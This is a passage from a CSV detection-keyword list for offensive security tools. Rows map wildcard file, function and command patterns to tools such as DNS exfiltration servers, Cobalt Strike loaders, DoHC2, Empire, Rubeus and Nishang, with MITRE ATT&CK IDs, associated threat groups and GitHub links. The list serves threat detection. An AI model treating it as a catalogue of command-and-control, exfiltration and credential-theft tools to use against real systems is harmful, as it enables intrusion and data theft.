T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","352","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" +"*DNS-Persist.git*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*dnsrecon -*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*dnsrecon*","offensive_tool_keyword","dnsrecon","DNSRecon is a Python port of a Ruby script that I wrote to learn the language and about DNS in early 2007. This time I wanted to learn about Python and extend the functionality of the original tool and in the process re-learn how DNS works and how could it be used in the process of a security assessment and network troubleshooting.","T1590 - T1590.001","TA0001 - TA0007","N/A","N/A","Information Gathering","https://github.com/darkoperator/dnsrecon","1","1","N/A","6","10","2336","516","2023-09-11T05:14:02Z","2010-12-16T03:25:49Z" +"*dnsrecon-zonetransfer*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*dnsteal.git*","offensive_tool_keyword","dnsteal","This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.","T1048.003 - T1568.002 - T1573.002","TA0010 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/m57/dnsteal","1","1","N/A","3","10","1378","236","2022-02-03T11:04:49Z","2015-08-11T17:02:58Z" +"*dnsteal.py*","offensive_tool_keyword","dnsteal","This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.","T1048.003 - T1568.002 - T1573.002","TA0010 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/m57/dnsteal","1","1","N/A","3","10","1378","236","2022-02-03T11:04:49Z","2015-08-11T17:02:58Z" +"*dnsteal-master*","offensive_tool_keyword","dnsteal","This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.","T1048.003 - T1568.002 - T1573.002","TA0010 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/m57/dnsteal","1","1","N/A","3","10","1378","236","2022-02-03T11:04:49Z","2015-08-11T17:02:58Z" +"*dnstracer*","offensive_tool_keyword","DNSTracer","This is a python application that traces how a DNS query is performed from a client machine to the server.","T1556 - T1016 - T1046","TA0007 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/pcoder/DNSTracer","1","0","N/A","3","1","6","1","2011-11-11T22:06:48Z","2011-07-07T18:36:07Z" +"*dnstwist*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"*dnsx -silent -d * -w dns_worldlist.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*dnsx -silent -d domains.txt -w jira*grafana*jenkins*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*do_attack(*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*do_bypassuac*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*do_pyinject*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*Do-AltShiftEsc*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Do-AltShiftTab*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*doc/extras/HACKING.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*docker * covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*docker * --name elite *","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*docker * -t elite *","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*docker build -t rmg .*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*docker run */pacu:latest*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*docker run */usr/src/rde1*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*docker run */usr/src/rec2*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*docker run -p * spring4shell","offensive_tool_keyword","Spring4Shell","Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/reznok/Spring4Shell-POC","1","0","N/A","N/A","4","303","229","2022-08-04T18:26:18Z","2022-03-31T00:24:28Z" +"*docker run sitadel*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" +"*docker* donut *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*docker-compose logs wiresocks*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" +"*DockerPwn*","offensive_tool_keyword","DockerPwn","Automation for abusing an exposed Docker TCP Socket. ","T1068 - T1528 - T1550","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/AbsoZed/DockerPwn.py","1","0","N/A","N/A","3","208","30","2022-12-08T03:17:35Z","2019-11-23T22:32:49Z" +"*DocPlz-main.zip*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*DocsPLZ\DocsPLZ.*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*DoEvil()*","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*Do-Exfiltration.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Doge-Loader*xor.go*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","10","10","277","61","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" +"*DoHC2*BeaconConnector*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*DoHC2.exe*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*DoHC2.py*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*DoHC2Runner.*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*DoHC2Runner.exe*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*DoHC2Runner.pdb*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*DoHChannel.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*-Domain * -AllowDelegation *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*-Domain * -SPN *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Domain/CommandCollection*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*-domain_admins.txt*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","0","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" +"*domain_analyzer.py*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" +"*domain_analyzer-master*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" +"*domain_hunter-v*.jar","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*domainDumpConfig*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z" +"*DomainEnumerator*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*domainhunter*","offensive_tool_keyword","domainhunter","Domain name selection is an important aspect of preparation for penetration tests and especially Red Team engagements. Commonly. domains that were used previously for benign purposes and were properly categorized can be purchased for only a few dollars. Such domains can allow a team to bypass reputation based web filters and network egress restrictions for phishing and C2 related tasks.This Python based tool was written to quickly query the Expireddomains.net search engine for expired/available domains with a previous history of use. It then optionally queries for domain reputation against services like Symantec Site Review (BlueCoat). IBM X-Force. and Cisco Talos. The primary tool output is a timestamped HTML table style report.","T1568 - T1596 - T1569 - T1593","N/A","N/A","N/A","Information Gathering","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","10","1380","291","2022-10-26T03:15:13Z","2017-03-01T11:16:26Z" +"*domainhunter.py*","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","1","N/A","N/A","10","1380","291","2022-10-26T03:15:13Z","2017-03-01T11:16:26Z" +"*Domaininfo/Domaininfo.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Domainpassspray*","offensive_tool_keyword","WinPwn","Automation for internal Windows 